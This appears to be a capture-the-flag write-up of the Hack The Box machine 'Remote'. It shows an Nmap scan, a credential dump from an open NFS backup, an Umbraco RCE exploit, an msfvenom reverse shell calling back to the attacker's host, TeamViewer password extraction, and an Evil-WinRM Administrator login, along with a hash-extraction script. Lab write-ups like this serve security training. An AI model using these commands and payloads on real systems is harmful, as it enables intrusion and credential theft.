TL;DR
- Mount NFS share and find credentials to login as admin on Umbraco (CMS)
- Exploit RCE on Umbraco to get a shell
- Find Team Viewer credentials and connect as Administrator with Windows Remote Management
User.txt
Reconnaissance
Let’s start with an Nmap scan:
magnussen@funcMyLife:~/remote$ nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN remote.txt 10.10.10.180
# Nmap 7.60 scan initiated Fri Jul 10 12:56:46 2020 as: nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN remote.txt remote.htb
Increasing send delay for 10.10.10.180 from 0 to 5 due to 142 out of 473 dropped probes since last increase.
Increasing send delay for 10.10.10.180 from 5 to 10 due to 181 out of 601 dropped probes since last increase.
Warning: 10.10.10.180 giving up on port because retransmission cap hit (10).
Nmap scan report for remote.htb (10.10.10.180)
Host is up, received echo-reply ttl 127 (0.18s latency).
Scanned at 2020-07-10 12:56:46 CEST for 217s
Not shown: 53899 closed ports, 11621 filtered ports
Reason: 53899 resets and 11621 no-responses
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home - Acme Widgets
111/tcp open rpcbind syn-ack ttl 127 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3,4 2049/tcp nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/udp mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100024 1 2049/tcp status
|_ 100024 1 2049/udp status
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
2049/tcp open mountd syn-ack ttl 127 1-3 (RPC #100005)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49678/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49679/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49680/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 45222/tcp): CLEAN (Couldn't connect)
| Check 2 (port 57430/tcp): CLEAN (Couldn't connect)
| Check 3 (port 33056/udp): CLEAN (Failed to receive data)
| Check 4 (port 15893/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-07-10 13:04:43
|_ start_date: 1601-01-01 00:09:21
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul 10 13:00:23 2020 -- 1 IP address (1 host up) scanned in 217.56 seconds
So we find 5 useful services:
- FTP (21)
- IIS (80)
- SMB (445)
- RPCBind (2049)
- WinRM (5985)
The website is some kind of blog.
We can log in with anonymous:anonymous on the FTP server but there’s nothing interesting.
NFS
We saw a service listening on port 2049, so let’s start by listing the NFS shares on the box.
NFS (Network File System) is a file system protocol that lets a client access files over a network much as it accesses local storage. It’s built on the Open Network Computing Remote Procedure Call (ONC RPC) system, which is why rpcbind (port 111) also shows up in the scan.
magnussen@funcMyLife:~/remote$ showmount -e remote.htb
Export list for remote.htb:
/site_backups (everyone)
Nice, we have a share called site_backups that’s available to everyone. Let’s mount it and dig into it.
magnussen@funcMyLife:~/remote$ mount -o hard,nolock remote.htb:/site_backups ./nfs_mount/
magnussen@funcMyLife:~/remote$ ls -alh nfs_mount/
total 123K
drwx------ 2 nobody 4294967294 4,0K févr. 23 19:35 .
drwxrwxr-x 4 magnussen magnussen 4,0K juil. 9 15:10 ..
drwx------ 2 nobody 4294967294 64 févr. 20 18:16 App_Browsers
drwx------ 2 nobody 4294967294 4,0K févr. 20 18:17 App_Data
drwx------ 2 nobody 4294967294 4,0K févr. 20 18:16 App_Plugins
drwx------ 2 nobody 4294967294 64 févr. 20 18:16 aspnet_client
drwx------ 2 nobody 4294967294 48K févr. 20 18:16 bin
drwx------ 2 nobody 4294967294 8,0K févr. 20 18:16 Config
drwx------ 2 nobody 4294967294 64 févr. 20 18:16 css
-rwx------ 1 nobody 4294967294 152 nov. 1 2018 default.aspx
-rwx------ 1 nobody 4294967294 89 nov. 1 2018 Global.asax
drwx------ 2 nobody 4294967294 4,0K févr. 20 18:16 Media
drwx------ 2 nobody 4294967294 64 févr. 20 18:16 scripts
drwx------ 2 nobody 4294967294 8,0K févr. 20 18:16 Umbraco
drwx------ 2 nobody 4294967294 4,0K févr. 20 18:16 Umbraco_Client
drwx------ 2 nobody 4294967294 4,0K févr. 20 18:16 Views
-rwx------ 1 nobody 4294967294 28K févr. 20 06:57 Web.config
Cool, we have access to a backup of the website. If we dig into it, we find an interesting file: App_Data/Umbraco.sdf, the SQL Server Compact database in which Umbraco keeps its users.
If we check its content we find some credentials:
magnussen@funcMyLife:~/remote$ head nfs_mount/App_Data/Umbraco.sdf
��V�t�t�y���Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d��׃rf�u�rf�v�rf���rf����X�v�������adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50��BiIf�hVg�v�rf�hVg����X�v�������adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f�[{"alias":"umbIntroIntroduction","completed":false,"disabled":true}]��?�g�.og���g����X�v�������smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e��?�g�Ag�.og�Og����Y�w�������ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749��~�
g�)�
The dump also tells us how the admin hash was produced ({"hashAlgorithm":"SHA1"}, i.e. plain unsalted SHA1), so after cracking the hash (b8be16afba8c314ad33d812f22a04991b90e2aaa) with CrackStation we find: baconandcheese.
We can log in to http://remote.htb/Umbraco with: admin@htb.local:baconandcheese.
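As an added example (not part of the original writeup), here is a small Python script that pulls the user records out of a raw Umbraco.sdf dump the way the `head` output above shows them, using the `{"hashAlgorithm":...}` marker as an anchor, and checks a candidate password against an unsalted SHA1 entry. The byte string is constructed to mirror the dump above; HMACSHA256 entries are extracted but not verified.

```python
import hashlib
import re

# Constructed sample modelled on the `head Umbraco.sdf` output above:
# printable fields are glued together and separated by non-printable bytes.
SAMPLE_SDF = (
    b"\x00\xa5\x08Administratoradmin"
    b"b8be16afba8c314ad33d812f22a04991b90e2aaa"
    b'{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d\x00\x08'
    b"\xff\x02smithsmith@htb.local"
    b"jxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts="
    b'{"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93\x00'
)

# Width of the stored hash field that precedes the algorithm marker:
# SHA1 is 40 hex chars; HMACSHA256 is base64(16-byte salt) + base64(32-byte
# digest) = 24 + 44 chars, exactly as seen in the dump.
HASH_WIDTH = {b"SHA1": 40, b"HMACSHA256": 68}
TAG_RE = re.compile(rb'\{"hashAlgorithm":"(\w+)"\}')

def extract_records(blob: bytes) -> list:
    """Return one dict per user record found in a raw .sdf byte dump."""
    records = []
    for m in TAG_RE.finditer(blob):
        algo = m.group(1)
        width = HASH_WIDTH.get(algo)
        if width is None:  # unknown algorithm: skip rather than guess a width
            continue
        before = blob[: m.start()]
        stored = before[-width:]
        # Name and login are glued together right in front of the hash
        # (e.g. "adminadmin@htb.local"), so keep that run as a single token.
        login = re.search(rb"[\w.@+-]+$", before[:-width])
        # The e-mail, when present, follows the marker and ends at "en-US".
        email = re.match(rb"([\w.+-]+@[\w.-]+?)en-US", blob[m.end():])
        records.append({
            "login": login.group(0).decode() if login else "",
            "email": email.group(1).decode() if email else "",
            "algorithm": algo.decode(),
            "hash": stored.decode(),
        })
    return records

def sha1_matches(candidate: str, stored_hex: str) -> bool:
    """Unsalted SHA1: a plain digest comparison is all a cracker needs."""
    return hashlib.sha1(candidate.encode()).hexdigest() == stored_hex.lower()

if __name__ == "__main__":
    print(extract_records(SAMPLE_SDF))
```

Feeding the real file in (`open("nfs_mount/App_Data/Umbraco.sdf", "rb").read()`) gives the same fields without needing a SQL CE reader; `sha1_matches` is what a wordlist loop would call for each candidate.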
RCE on Umbraco
Once we’re logged in, we find Umbraco’s version: 7.12.4.
If we google for an exploit, we find the following script: https://github.com/noraj/Umbraco-RCE.
Let’s start by creating a reverse shell executable with msfvenom:
magnussen@funcMyLife:~/remote$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.15.158 LPORT=7777 -f exe > magnussen.exe
Let’s upload our reverse shell to the server through the media library at http://remote.htb/Umbraco#/media.
Now we have to locate our file on the box and execute our reverse shell:
magnussen@funcMyLife:~/remote$ python3 exploit.py -u "admin@htb.local" -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a '-NoProfile -Command ls C:/inetpub/wwwroot/Media/1033'
Directory: C:\inetpub\wwwroot\Media\1033
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/10/2020 1:31 PM 73802 magnussen.exe
magnussen@funcMyLife:~/remote$ msfconsole
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.15.158
LHOST => 10.10.15.158
msf5 exploit(multi/handler) > set LPORT 7777
LPORT => 7777
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.15.158:7777
magnussen@funcMyLife:~/remote$ python3 exploit.py -u "admin@htb.local" -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a 'C:/inetpub/wwwroot/Media/1033/magnussen.exe'
msf5 exploit(multi/handler) >
[*] Started reverse TCP handler on 10.10.15.158:7777
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.10.180
[*] Command shell session 1 opened (10.10.15.158:7777 -> 10.10.10.180:49687) at 2020-07-10 19:31:13 +0200
C:\windows\system32\inetsrv>
Yeah! We have a shell, let’s go get that user.txt.
C:\windows\system32\inetsrv> cd c:\Users\Public
c:\Users\Public>type user.txt
type user.txt
2cc0eb5c564ee64f6f01d6273d920b53
I AM ROOT
Teamviewer & WinRM
Now we just have to escalate privileges. First of all, let’s check the running processes:
c:\Users\Public> tasklist
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
System Idle Process 0 0 8 K
System 4 0 148 K
Registry 104 0 23,208 K
smss.exe 300 0 1,220 K
csrss.exe 408 0 5,552 K
wininit.exe 488 0 6,820 K
csrss.exe 496 1 4,736 K
winlogon.exe 588 1 14,260 K
services.exe 628 0 9,976 K
lsass.exe 648 0 13,980 K
svchost.exe 772 0 3,756 K
svchost.exe 796 0 14,524 K
fontdrvhost.exe 820 0 4,024 K
fontdrvhost.exe 828 1 4,284 K
svchost.exe 916 0 10,224 K
svchost.exe 960 0 6,992 K
dwm.exe 268 1 32,976 K
svchost.exe 564 0 8,060 K
svchost.exe 1032 0 5,864 K
svchost.exe 1092 0 11,580 K
svchost.exe 1156 0 5,624 K
svchost.exe 1224 0 15,400 K
vmacthlp.exe 1300 0 6,340 K
svchost.exe 1344 0 7,808 K
svchost.exe 1372 0 7,396 K
svchost.exe 1388 0 5,520 K
svchost.exe 1396 0 11,048 K
svchost.exe 1416 0 9,012 K
svchost.exe 1424 0 7,404 K
svchost.exe 1568 0 5,708 K
svchost.exe 1604 0 14,052 K
svchost.exe 1640 0 11,400 K
svchost.exe 1668 0 8,804 K
svchost.exe 1676 0 8,456 K
svchost.exe 1768 0 8,108 K
svchost.exe 1792 0 8,476 K
svchost.exe 1944 0 6,912 K
svchost.exe 1992 0 7,716 K
svchost.exe 1468 0 15,748 K
svchost.exe 2084 0 8,084 K
svchost.exe 2108 0 8,412 K
svchost.exe 2276 0 7,776 K
svchost.exe 2284 0 7,268 K
spoolsv.exe 2668 0 16,268 K
svchost.exe 2720 0 10,736 K
svchost.exe 2728 0 12,284 K
svchost.exe 2736 0 24,904 K
svchost.exe 2756 0 12,324 K
svchost.exe 2784 0 19,920 K
inetinfo.exe 2796 0 17,448 K
svchost.exe 2868 0 6,532 K
svchost.exe 2888 0 8,296 K
svchost.exe 2952 0 6,176 K
svchost.exe 2964 0 5,348 K
vmtoolsd.exe 2972 0 18,104 K
VGAuthService.exe 2980 0 10,264 K
svchost.exe 3000 0 12,240 K
svchost.exe 3060 0 7,364 K
TeamViewer_Service.exe 1204 0 18,724 K
svchost.exe 1720 0 10,708 K
MsMpEng.exe 2080 0 134,228 K
svchost.exe 2384 0 11,668 K
svchost.exe 3088 0 12,584 K
nfssvc.exe 3380 0 5,328 K
svchost.exe 3692 0 12,156 K
dllhost.exe 3396 0 13,336 K
msdtc.exe 4376 0 10,440 K
WmiPrvSE.exe 4920 0 18,384 K
LogonUI.exe 4936 1 42,808 K
svchost.exe 5872 0 5,388 K
w3wp.exe 5316 0 349,928 K
svchost.exe 1620 0 12,044 K
svchost.exe 992 0 14,124 K
svchost.exe 868 0 13,000 K
svchost.exe 352 0 33,100 K
SearchIndexer.exe 1120 0 19,932 K
svchost.exe 2676 0 11,528 K
svchost.exe 1776 0 10,168 K
svchost.exe 2772 0 5,864 K
svchost.exe 816 0 7,376 K
magnussen.exe 1080 0 3,724 K
cmd.exe 2828 0 4,748 K
conhost.exe 2692 0 10,840 K
WmiPrvSE.exe 3096 0 8,256 K
tasklist.exe 4944 0 7,828 K
Mmmh, the TeamViewer service might be interesting.
While searching for exploits on TeamViewer, I found this really amazing article.
We might be able to retrieve the TeamViewer password: the AES key TeamViewer uses to encrypt the stored password is hard-coded and publicly known, and there’s even a Metasploit post module for that. Let’s run it!
meterpreter > run post/windows/gather/credentials/teamviewer_passwords
[*] Finding TeamViewer Passwords on REMOTE
[+] Found Unattended Password: !R3m0te!
[+] Passwords stored in: /home/magnussen/.msf4/loot/20200710194708_default_10.10.10.180_host.teamviewer__202492.txt
[*] <---------------- | Using Window Technique | ---------------->
[*] TeamViewer's language setting options are ''
[*] TeamViewer's version is ''
[-] Unable to find TeamViewer's process
Yes! We have the password (!R3m0te!)!
We saw earlier that WinRM is available, so let’s connect with Evil-WinRM using this password and the Administrator account (the TeamViewer password was reused for the local Administrator).
WinRM (Windows Remote Management) is a built-in remote management protocol, served here over HTTP on port 5985, that allows commands to be executed remotely.
magnussen@funcMyLife:~/remote$ ./evil-winrm.rb -i 10.10.10.180 -u Administrator -p '!R3m0te!'
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
remote\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/10/2020 1:18 PM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
6e9e9a86aa92b84a6ebd307b78691bc6
I AM ROOT!
This was a great box, not very difficult, but I’ve learned a lot about Windows thanks to it! Thanks Mrb3n for the box!